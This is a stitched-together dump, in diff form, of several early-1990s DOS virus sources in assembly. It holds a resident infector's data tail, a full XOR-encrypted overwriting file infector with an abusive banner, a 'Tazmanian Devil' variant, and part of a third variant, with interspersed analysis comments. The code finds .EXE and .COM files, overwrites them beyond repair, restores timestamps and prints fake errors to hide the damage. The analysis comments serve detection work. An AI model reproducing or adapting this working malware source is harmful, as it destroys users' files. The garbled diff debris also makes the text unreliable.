; Int 24h handler ------------------------------------------------------------
|
||||
INT24: xor al, al ; Ignore critical error
|
||||
iret
|
||||
; ----------------------------------------------------------------------------
|
||||
|
||||
|
||||
; **************************** END of DOG **********************************
|
||||
|
||||
DogData:
|
||||
M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h
|
||||
Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11
|
||||
DogCall db 0E9h
|
||||
FSize dw 0606h
|
||||
Sign db 'V', 2
|
||||
Handle dw 0606h
|
||||
Vers dw 0606h
|
||||
FDate dw 0606h, 0606h ; Date, Time
|
||||
Old24h dw 0606h, 0606h ; BX:ES
|
||||
Attrib dw 0606h
|
||||
Place dw 0606h
|
||||
END
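Review bot: The `TITLE The Carcharias taurus 2.0` line is the only description this section carries, so the Loader/Dog split, the residency trick and the payload are undocumented for anyone reading the sample; I would add an analysis comment under the `DogSize` constant. It should say that the loader takes 1 KB by decrementing the `'Z'` MCB size, the current PSP's top-of-memory word and the BIOS memory-size word at 0000:0413h, copies `DogSize` bytes above the arena, hooks INT 21h through the far jump at `Exit21h`, and that the resident part acts on AX=4B00h: it rejects `MZ`/`ZM` files and files already carrying the word `0256h` (bytes `'V',02h`) at offset 3, appends itself, then rewrites the first six bytes from `DogCall`. The payload runs in January of 1993 or later between 14:30 and 14:59 and prints `Tired` after subtracting 1 from each byte, which decodes to `Happy New Year !`; spelling that out makes the string searchable even though it is not stored in clear. The decremented 0000:0413h word, the `0256h` marker at file offset 3 and the INT 24h handler that returns AL=0 (`; Ignore critical error`) are the indicators an analyst would record, and an original host is recoverable from the six bytes saved at `M_6Bytes` followed by truncation of the appended `DogSize` bytes.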
|
||||
|
|
@ -0,0 +1,278 @@
|
|||
cr equ 13 ; This VIRUS was written 12-14-1992
|
||||
lf equ 10 ; AND QUIT READING MY SOURCE CODE
|
||||
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
|
||||
virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
|
||||
code_start equ 100h ; Address right after PSP in memory
|
||||
dta equ 80h ; Addr of default disk transfer area
|
||||
datestamp equ 24 ; Offset in DTA of file's date stamp
|
||||
timestamp equ 22 ; Offset in DTA of file's time stamp
|
||||
filename equ 30 ; Offset in DTA of ASCIIZ filename
|
||||
attribute equ 21 ; Offset in DTA of file attribute
|
||||
|
||||
|
||||
code segment 'code' ; Open code segment
|
||||
assume cs:code,ds:code ; One segment for both code & data
|
||||
org code_start ; Start code image after PSP
|
||||
|
||||
;---------------------------------------------------------------------
|
||||
; All executable code is contained in boundaries of procedure "main".
|
||||
; The following code, until the start of "virus_code", is the non-
|
||||
; encrypted CMT portion of the code to load up the real program.
|
||||
;---------------------------------------------------------------------
|
||||
main proc near ; Code execution begins here
|
||||
call encrypt_decrypt ; Decrypt the real virus code
|
||||
jmp random_mutation ; Put the virus into action
|
||||
|
||||
encrypt_val db 00h ; Hold value to encrypt by here
|
||||
|
||||
; ---------- Encrypt, save, and restore the virus code -----------
|
||||
infect_file:
|
||||
mov bx,handle ; Get the handle
|
||||
push bx ; Save it on the stack
|
||||
call encrypt_decrypt ; Encrypt most of the code
|
||||
pop bx ; Get back the handle
|
||||
mov cx,virus_size ; Total number of bytes to write
|
||||
mov dx,code_start ; Buffer where code starts in memory
|
||||
mov ah,40h ; DOS write-to-handle service
|
||||
int 21h ; Write the virus code into the file
|
||||
call encrypt_decrypt ; Restore the code as it was
|
||||
ret ; Go back to where you came from
|
||||
|
||||
; --------------- Encrypt or decrypt the virus code ----------------
|
||||
encrypt_decrypt:
|
||||
mov bx,offset virus_code ; Get address to start encrypt/decrypt
|
||||
xor_loop: ; Start cycle here
|
||||
mov ah,[bx] ; Get the current byte
|
||||
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
|
||||
mov [bx],ah ; Put it back where we got it
|
||||
inc bx ; Move BX ahead a byte
|
||||
cmp bx,offset virus_code+virus_size ; Are we at the end?
|
||||
jle xor_loop ; If not, do another cycle
|
||||
ret ; and go back where we came from
|
||||
|
||||
;-----------------------------------------------------------------------
|
||||
; The rest of the code from here on remains encrypted until run-time,
|
||||
; using a fundamental XOR technique that changes via CMT.
|
||||
;-----------------------------------------------------------------------
|
||||
virus_code:
|
||||
|
||||
;----------------------------------------------------------------------------
|
||||
; All strings are kept here in the file, and automatically encrypted.
|
||||
; Please don't be a lamer and change the strings and say you wrote a virus.
|
||||
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
|
||||
; changes, even when the strings stay the same.
|
||||
;----------------------------------------------------------------------------
|
||||
exe_filespec db "*.EXE",0
|
||||
com_filespec db "*.COM",0
|
||||
newdir db "..",0
|
||||
fake_msg db cr,lf,"Bad command or filename$"
|
||||
virus_msg1 db cr,lf," ÜÜÜÜÜÜ$"
|
||||
virus_msg2 db cr,lf," ÜÜÜÜÜÜÜ ÜÜ ÜÜ ÜÛÛÛÛÛÛÛÛÜ$"
|
||||
virus_msg3 db cr,lf,"ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ ÜÛÛÛÝ ÞÛÛÛÛßßÛÛÛÛÝ$"
|
||||
virus_msg4 db cr,lf,"ÛÛÛÛ ÛÛÛÝÛÛÛß ÛÛÛÛÝ ÞÛÛÛÛ ÜÜÜÜ ÜÜÜÜ$"
|
||||
virus_msg5 db cr,lf,"ÞÛÛÛÛÛÛÜ ÜÜ ÜÜ ÜÛÛÛÜ ÞÛÛÛÛÛÝ ÞÛÛÛÛ ÛÛÛÛÝ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÜ$"
|
||||
virus_msg6 db cr,lf,"ÛÛÛÛßßßßÞÛÛ ÛÛÛÝÞÛÛÛß ÞÛÛÛÛßÛÛÛ ÛÛÛÛÝ ÞÛÛÛÛ ÞÛÛÛß ßÛß ÞÛÛÛß ßÛß$"
|
||||
virus_msg7 db cr,lf,"ÛÛÛÛÝ ÞÛÛÝÛÛÛÛÝÞÛÛÛÜ ÛÛÛÛÛÞÛÛÛÜ ÜÛÜ ÞÛÛÛÛÜÜÛÛÛÛÝÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ$"
|
||||
virus_msg8 db cr,lf," ßÛÛÛß ßÛÛÛÛÛß ßÛÛÛß ßÛÛß ßÛÛß Þßß Ý ßÛÛÛÛÛÛÛÛß ÞÛÛÝ ÞÛÛÝ$"
|
||||
virus_msg9 db cr,lf," ÞÛÛÛÝ ßßßßßß ÛÛÛ ÛÛÛ$"
|
||||
virus_msg10 db cr,lf," ÛßÜÛÛ ÞÛÛÝ ÞÛÛÝ$"
|
||||
virus_msg11 db cr,lf," ÞÛßßÝ ÜÜÛÛß ÜÜÛÛß$"
|
||||
virus_msg12 db cr,lf," ÜÜ ÞÛÛÛÝ ÜÜ ßßßß ßßßß$"
|
||||
virus_msg13 db cr,lf," ÛÛÛÛÞÛÛÝÝÛÛÛÛ$"
|
||||
virus_msg14 db cr,lf," ÞÛÝÛÛÛÛÞÜÛÛÝÞÛÛÛÝ ÜÜÜÛÛÛÜ$"
|
||||
virus_msg15 db cr,lf," ÛÛÛÞÛÛÛÛÛÝÜ ÛÛÛÛÛÜÛÛÛßßß$"
|
||||
virus_msg16 db cr,lf," ÛÛÛÛÛßÛÛ ÛßÛÛÛÛÛÛÛßß$"
|
||||
virus_msg17 db cr,lf," ÛÛÛÛÛÛÜ ÛÜÛÛÛÛÛÛß$"
|
||||
virus_msg18 db cr,lf," ßßÛÛÜÛÝÛÛÛÛÛÛÝ$"
|
||||
virus_msg19 db cr,lf," ÞßÛÛÛ ÜÛÛÛÝ$"
|
||||
virus_msg20 db cr,lf," ÛÜÛÛÝßßÜÛÛ$"
|
||||
virus_msg21 db cr,lf," ÞÛÛÜÛÛÛÛÛÛÛÝ$"
|
||||
virus_msg22 db cr,lf," ÞÛÛÛÛÝÛßÛÛÛÝ$"
|
||||
virus_msg23 db cr,lf," ÞÛÛÜÛÜÛÛÛÛÛÝ$"
|
||||
compare_buf db 20 dup (?) ; Buffer to compare files in
|
||||
files_found db ?
|
||||
files_infected db ?
|
||||
orig_time dw ?
|
||||
orig_date dw ?
|
||||
orig_attr dw ?
|
||||
handle dw ?
|
||||
success db ?
|
||||
|
||||
random_mutation: ; First decide if virus is to mutate
|
||||
mov ah,2ch ; Set up DOS function to get time
|
||||
int 21h
|
||||
cmp encrypt_val,0 ; Is this a first-run virus copy?
|
||||
je install_val ; If so, install whatever you get.
|
||||
cmp dh,15 ; Is it less than 16 seconds?
|
||||
jg find_extension ; If not, don't mutate this time
|
||||
install_val:
|
||||
cmp dl,0 ; Will we be encrypting using zero?
|
||||
je random_mutation ; If so, get a new value.
|
||||
mov encrypt_val,dl ; Otherwise, save the new value
|
||||
find_extension: ; Locate file w/ valid extension
|
||||
mov files_found,0 ; Count infected files found
|
||||
mov files_infected,10 ; BX counts file infected so far
|
||||
mov success,0
|
||||
find_exe:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset exe_filespec ; Check for .EXE extension first
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je find_com ; If not, nothing more to do
|
||||
call find_healthy ; Otherwise, try to find healthy .EXE
|
||||
find_com:
|
||||
mov cx,00100111b ; Look for all flat file attributes
|
||||
mov dx,offset com_filespec ; Check for .COM extension now
|
||||
mov ah,4eh ; Call DOS find first service
|
||||
int 21h
|
||||
cmp ax,12h ; Are no files found?
|
||||
je chdir ; If not, step back a directory
|
||||
call find_healthy ; Otherwise, try to find healthy .COM
|
||||
chdir: ; Routine to step back one level
|
||||
mov dx,offset newdir ; Load DX with address of pathname
|
||||
mov ah,3bh ; Change directory DOS service
|
||||
int 21h
|
||||
dec files_infected ; This counts as infecting a file
|
||||
jnz find_exe ; If we're still rolling, find another
|
||||
jmp exit_virus ; Otherwise let's pack it up
|
||||
find_healthy:
|
||||
mov bx,dta ; Point BX to address of DTA
|
||||
mov ax,[bx]+attribute ; Get the current file's attribute
|
||||
mov orig_attr,ax ; Save it
|
||||
mov ax,[bx]+timestamp ; Get the current file's time stamp
|
||||
mov orig_time,ax ; Save it
|
||||
mov ax,[bx]+datestamp ; Get the current file's data stamp
|
||||
mov orig_date,ax ; Save it
|
||||
mov dx,dta+filename ; Get the filename to change attribute
|
||||
mov cx,0 ; Clear all attribute bytes
|
||||
mov al,1 ; Set attribute sub-function
|
||||
mov ah,43h ; Call DOS service to do it
|
||||
int 21h
|
||||
mov al,2 ; Set up to open handle for read/write
|
||||
mov ah,3dh ; Open file handle DOS service
|
||||
int 21h
|
||||
mov handle,ax ; Save the file handle
|
||||
mov bx,ax ; Transfer the handle to BX for read
|
||||
mov cx,20 ; Read in the top 20 bytes of file
|
||||
mov dx,offset compare_buf ; Use the small buffer up top
|
||||
mov ah,3fh ; DOS read-from-handle service
|
||||
int 21h
|
||||
mov bx,offset compare_buf ; Adjust the encryption value
|
||||
mov ah,encrypt_val ; for accurate comparison
|
||||
mov [bx+6],ah
|
||||
mov si,code_start ; One array to compare is this file
|
||||
mov di,offset compare_buf ; The other array is the buffer
|
||||
mov ax,ds ; Transfer the DS register...
|
||||
mov es,ax ; ...to the ES register
|
||||
cld
|
||||
repe cmpsb ; Compare the buffer to the virus
|
||||
jne healthy ; If different, the file is healthy!
|
||||
call close_file ; Close it up otherwise
|
||||
inc files_found ; Chalk up another fucked up file
|
||||
continue_search:
|
||||
mov ah,4fh ; Find next DOS function
|
||||
int 21h ; Try to find another same type file
|
||||
cmp ax,12h ; Are there any more files?
|
||||
je no_more_found ; If not, get outta here
|
||||
jmp find_healthy ; If so, try the process on this one!
|
||||
no_more_found:
|
||||
ret ; Go back to where we came from
|
||||
healthy:
|
||||
mov bx,handle ; Get the file handle
|
||||
mov ah,3eh ; Close it for now
|
||||
int 21h
|
||||
mov ah,3dh ; Open it again, to reset it
|
||||
mov dx,dta+filename
|
||||
mov al,2
|
||||
int 21h
|
||||
mov handle,ax ; Save the handle again
|
||||
call infect_file ; Infect the healthy file
|
||||
call close_file ; Close down this operation
|
||||
inc success ; Indicate we did something this time
|
||||
dec files_infected ; Scratch off another file on agenda
|
||||
jz exit_virus ; If we're through, terminate
|
||||
jmp continue_search ; Otherwise, try another
|
||||
ret
|
||||
close_file:
|
||||
mov bx,handle ; Get the file handle off the stack
|
||||
mov cx,orig_time ; Get the date stamp
|
||||
mov dx,orig_date ; Get the time stamp
|
||||
mov al,1 ; Set file date/time sub-service
|
||||
mov ah,57h ; Get/Set file date and time service
|
||||
int 21h ; Call DOS
|
||||
mov bx,handle
|
||||
mov ah,3eh ; Close handle DOS service
|
||||
int 21h
|
||||
mov cx,orig_attr ; Get the file's original attribute
|
||||
mov al,1 ; Instruct DOS to put it back there
|
||||
mov dx,dta+filename ; Feed it the filename
|
||||
mov ah,43h ; Call DOS
|
||||
int 21h
|
||||
ret
|
||||
exit_virus:
|
||||
cmp files_found,5 ; Are at least 5 files infected?
|
||||
jl print_fake ; If not, keep a low profile
|
||||
cmp success,0 ; Did we infect anything?
|
||||
jg print_fake ; If so, cover it up
|
||||
mov ah,09h ; Use DOS print string service
|
||||
mov dx,offset virus_msg1 ; Load the address of the first line
|
||||
int 21h ; Print it
|
||||
mov dx,offset virus_msg2 ; Load the second line
|
||||
int 21h ; (etc)
|
||||
mov dx,offset virus_msg3
|
||||
int 21h
|
||||
mov dx,offset virus_msg4
|
||||
int 21h
|
||||
mov dx,offset virus_msg5
|
||||
int 21h
|
||||
mov dx,offset virus_msg6
|
||||
int 21h
|
||||
mov dx,offset virus_msg7
|
||||
int 21h
|
||||
mov dx,offset virus_msg8
|
||||
int 21h
|
||||
mov dx,offset virus_msg9
|
||||
int 21h
|
||||
mov dx,offset virus_msg10
|
||||
int 21h
|
||||
mov dx,offset virus_msg11
|
||||
int 21h
|
||||
mov dx,offset virus_msg12
|
||||
int 21h
|
||||
mov dx,offset virus_msg13
|
||||
int 21h
|
||||
mov dx,offset virus_msg14
|
||||
int 21h
|
||||
mov dx,offset virus_msg15
|
||||
int 21h
|
||||
mov dx,offset virus_msg16
|
||||
int 21h
|
||||
mov dx,offset virus_msg17
|
||||
int 21h
|
||||
mov dx,offset virus_msg18
|
||||
int 21h
|
||||
mov dx,offset virus_msg19
|
||||
int 21h
|
||||
mov dx,offset virus_msg20
|
||||
int 21h
|
||||
mov dx,offset virus_msg21
|
||||
int 21h
|
||||
mov dx,offset virus_msg22
|
||||
int 21h
|
||||
mov dx,offset virus_msg23
|
||||
int 21h
|
||||
jmp terminate
|
||||
print_fake:
|
||||
mov ah,09h ; Use DOS to print fake error message
|
||||
mov dx,offset fake_msg
|
||||
int 21h
|
||||
terminate:
|
||||
mov ah,4ch ; DOS terminate process function
|
||||
int 21h ; Call DOS to get out of this program
|
||||
|
||||
; filler db 8 dup (90h) ; Pad out the file length to 666 bytes
|
||||
|
||||
main endp
|
||||
code ends
|
||||
end main
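Review bot: Apart from the banner in the `cr`/`lf`/`tab` equates, this section never states what the sample does to a host, and `virus_size` is the only hint of its layout; I would add an analysis comment after the `org code_start` line. It should say that `infect_file` writes `virus_size` bytes from `code_start` over the start of the host without saving what was there, so infected files are overwritten rather than prepended and cannot be repaired; that `find_healthy` treats a file as already infected when its first 20 bytes match the virus once byte 6 of the buffer is patched to `encrypt_val`; and that the `find_exe`/`find_com`/`chdir` loop repeats for up to ten infections or `..` steps toward the root. The "CMT" mutation is a single-byte XOR of everything from `virus_code` onward with the key stored at offset 6 (the byte after the `call encrypt_decrypt`/`jmp random_mutation` pair), so a scanner can normalize the body from the fixed 6-byte prefix plus that key, and the DOS AH=2Ch seconds/hundredths fields are the key source. The `fake_msg` text `Bad command or filename` printed at `print_fake` is the user-visible artifact worth listing alongside the ANSI-art block.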
|
|
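--- /dev/null
+++ b/PATH_NOT_ON_PAGE_1
@@ -0,0 +1,276 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 2197 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+code segment 'code' ; Open code segment
+assume cs:code,ds:code ; One segment for both code & data
+org code_start ; Start code image after PSP
+
+;---------------------------------------------------------------------
+; All executable code is contained in boundaries of procedure "main".
+; The following code, until the start of "virus_code", is the non-
+; encrypted CMT portion of the code to load up the real program.
+;---------------------------------------------------------------------
+main proc near ; Code execution begins here
+call encrypt_decrypt ; Decrypt the real virus code
+jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+; ---------- Encrypt, save, and restore the virus code -----------
+infect_file:
+mov bx,handle ; Get the handle
+push bx ; Save it on the stack
+call encrypt_decrypt ; Encrypt most of the code
+pop bx ; Get back the handle
+mov cx,virus_size ; Total number of bytes to write
+mov dx,code_start ; Buffer where code starts in memory
+mov ah,40h ; DOS write-to-handle service
+int 21h ; Write the virus code into the file
+call encrypt_decrypt ; Restore the code as it was
+ret ; Go back to where you came from
+
+; --------------- Encrypt or decrypt the virus code ----------------
+encrypt_decrypt:
+mov bx,offset virus_code ; Get address to start encrypt/decrypt
+xor_loop: ; Start cycle here
+mov ah,[bx] ; Get the current byte
+xor ah,encrypt_val ; Engage/disengage XOR scheme on it
+mov [bx],ah ; Put it back where we got it
+inc bx ; Move BX ahead a byte
+cmp bx,offset virus_code+virus_size ; Are we at the end?
+jle xor_loop ; If not, do another cycle
+ret ; and go back where we came from
+
+;-----------------------------------------------------------------------
+; The rest of the code from here on remains encrypted until run-time,
+; using a fundamental XOR technique that changes via CMT.
+;-----------------------------------------------------------------------
+virus_code:
+
+;----------------------------------------------------------------------------
+; All strings are kept here in the file, and automatically encrypted.
+; Please don't be a lamer and change the strings and say you wrote a virus.
+; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
+; changes, even when the strings stay the same.
+;----------------------------------------------------------------------------
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Program too big to fit in memory$"
+virus_msg1 db cr," ÜÜÜßÜÛÛÛÜ $"
+virus_msg2 db cr," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
+virus_msg3 db cr," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
+virus_msg4 db cr," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
+virus_msg5 db cr," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
+virus_msg6 db cr," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
+virus_msg7 db cr," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
+virus_msg8 db cr," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
+virus_msg9 db cr," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
+virus_msg10 db cr," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
+virus_msg11 db cr," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
+virus_msg12 db cr," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
+virus_msg13 db cr," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
+virus_msg14 db cr," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
+virus_msg15 db cr," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
+virus_msg16 db cr," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
+virus_msg17 db cr," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
+virus_msg18 db cr," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
+virus_msg19 db cr,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
+virus_msg20 db cr," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
+virus_msg21 db cr," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
+virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+mov ah,2ch ; Set up DOS function to get time
+int 21h
+cmp encrypt_val,0 ; Is this a first-run virus copy?
+je install_val ; If so, install whatever you get.
+cmp dh,15 ; Is it less than 16 seconds?
+jg find_extension ; If not, don't mutate this time
+install_val:
+cmp dl,0 ; Will we be encrypting using zero?
+je random_mutation ; If so, get a new value.
+mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+mov files_found,0 ; Count infected files found
+mov files_infected,4 ; BX counts file infected so far
+mov success,0
+find_exe:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset exe_filespec ; Check for .EXE extension first
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je find_com ; If not, nothing more to do
+call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+mov cx,00100111b ; Look for all flat file attributes
+mov dx,offset com_filespec ; Check for .COM extension now
+mov ah,4eh ; Call DOS find first service
+int 21h
+cmp ax,12h ; Are no files found?
+je chdir ; If not, step back a directory
+call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+mov dx,offset newdir ; Load DX with address of pathname
+mov ah,3bh ; Change directory DOS service
+int 21h
+dec files_infected ; This counts as infecting a file
+jnz find_exe ; If we're still rolling, find another
+jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+mov bx,dta ; Point BX to address of DTA
+mov ax,[bx]+attribute ; Get the current file's attribute
+mov orig_attr,ax ; Save it
+mov ax,[bx]+timestamp ; Get the current file's time stamp
+mov orig_time,ax ; Save it
+mov ax,[bx]+datestamp ; Get the current file's data stamp
+mov orig_date,ax ; Save it
+mov dx,dta+filename ; Get the filename to change attribute
+mov cx,0 ; Clear all attribute bytes
+mov al,1 ; Set attribute sub-function
+mov ah,43h ; Call DOS service to do it
+int 21h
+mov al,2 ; Set up to open handle for read/write
+mov ah,3dh ; Open file handle DOS service
+int 21h
+mov handle,ax ; Save the file handle
+mov bx,ax ; Transfer the handle to BX for read
+mov cx,20 ; Read in the top 20 bytes of file
+mov dx,offset compare_buf ; Use the small buffer up top
+mov ah,3fh ; DOS read-from-handle service
+int 21h
+mov bx,offset compare_buf ; Adjust the encryption value
+mov ah,encrypt_val ; for accurate comparison
+mov [bx+6],ah
+mov si,code_start ; One array to compare is this file
+mov di,offset compare_buf ; The other array is the buffer
+mov ax,ds ; Transfer the DS register...
+mov es,ax ; ...to the ES register
+cld
+repe cmpsb ; Compare the buffer to the virus
+jne healthy ; If different, the file is healthy!
+call close_file ; Close it up otherwise
+inc files_found ; Chalk up another fucked up file
+continue_search:
+mov ah,4fh ; Find next DOS function
+int 21h ; Try to find another same type file
+cmp ax,12h ; Are there any more files?
+je no_more_found ; If not, get outta here
+jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ret ; Go back to where we came from
+healthy:
+mov bx,handle ; Get the file handle
+mov ah,3eh ; Close it for now
+int 21h
+mov ah,3dh ; Open it again, to reset it
+mov dx,dta+filename
+mov al,2
+int 21h
+mov handle,ax ; Save the handle again
+call infect_file ; Infect the healthy file
+call close_file ; Close down this operation
+inc success ; Indicate we did something this time
+dec files_infected ; Scratch off another file on agenda
+jz exit_virus ; If we're through, terminate
+jmp continue_search ; Otherwise, try another
+ret
+close_file:
+mov bx,handle ; Get the file handle off the stack
+mov cx,orig_time ; Get the date stamp
+mov dx,orig_date ; Get the time stamp
+mov al,1 ; Set file date/time sub-service
+mov ah,57h ; Get/Set file date and time service
+int 21h ; Call DOS
+mov bx,handle
+mov ah,3eh ; Close handle DOS service
+int 21h
+mov cx,orig_attr ; Get the file's original attribute
+mov al,1 ; Instruct DOS to put it back there
+mov dx,dta+filename ; Feed it the filename
+mov ah,43h ; Call DOS
+int 21h
+ret
+exit_virus:
+cmp files_found,6 ; Are at least 6 files infected?
+jl print_fake ; If not, keep a low profile
+cmp success,0 ; Did we infect anything?
+jg print_fake ; If so, cover it up
+mov ah,09h ; Use DOS print string service
+mov dx,offset virus_msg1 ; Load the address of the first line
+int 21h ; Print it
+mov dx,offset virus_msg2 ; Load the second line
+int 21h ; (etc)
+mov dx,offset virus_msg3
+int 21h
+mov dx,offset virus_msg4
+int 21h
+mov dx,offset virus_msg5
+int 21h
+mov dx,offset virus_msg6
+int 21h
+mov dx,offset virus_msg7
+int 21h
+mov dx,offset virus_msg8
+int 21h
+mov dx,offset virus_msg9
+int 21h
+mov dx,offset virus_msg10
+int 21h
+mov dx,offset virus_msg11
+int 21h
+mov dx,offset virus_msg12
+int 21h
+mov dx,offset virus_msg13
+int 21h
+mov dx,offset virus_msg14
+int 21h
+mov dx,offset virus_msg15
+int 21h
+mov dx,offset virus_msg16
+int 21h
+mov dx,offset virus_msg17
+int 21h
+mov dx,offset virus_msg18
+int 21h
+mov dx,offset virus_msg19
+int 21h
+mov dx,offset virus_msg20
+int 21h
+mov dx,offset virus_msg21
+int 21h
+mov dx,offset virus_msg22
+int 21h
+
+jmp terminate
+print_fake:
+mov ah,09h ; Use DOS to print fake error message
+mov dx,offset fake_msg
+int 21h
+terminate:
+mov ah,4ch ; DOS terminate process function
+int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+end main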
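--- /dev/null
+++ b/PATH_NOT_ON_PAGE_2
@@ -0,0 +1,240 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 562 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+code segment 'code' ; Open code segment
+assume cs:code,ds:code ; One segment for both code & data
+org code_start ; Start code image after PSP
+
+main proc near ; Code execution begins here
+jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+infect_file:
+mov bx,handle ; Get the handle
+push bx ; Save it on the stack
+pop bx ; Get back the handle
+mov cx,virus_size ; Total number of bytes to write
+mov dx,code_start ; Buffer where code starts in memory
+mov ah,40h ; DOS write-to-handle service
+int 21h ; Write the virus code into the file
+ret ; Go back to where you came from
+
+
+virus_code:
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
+virus_msg1 db cr,lf,tab," ÜÜÜßÜÛÛÛÜ $"
+virus_msg2 db cr,lf,tab," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
+virus_msg3 db cr,lf,tab," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
+virus_msg4 db cr,lf,tab," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
+virus_msg5 db cr,lf,tab," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
+virus_msg6 db cr,lf,tab," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
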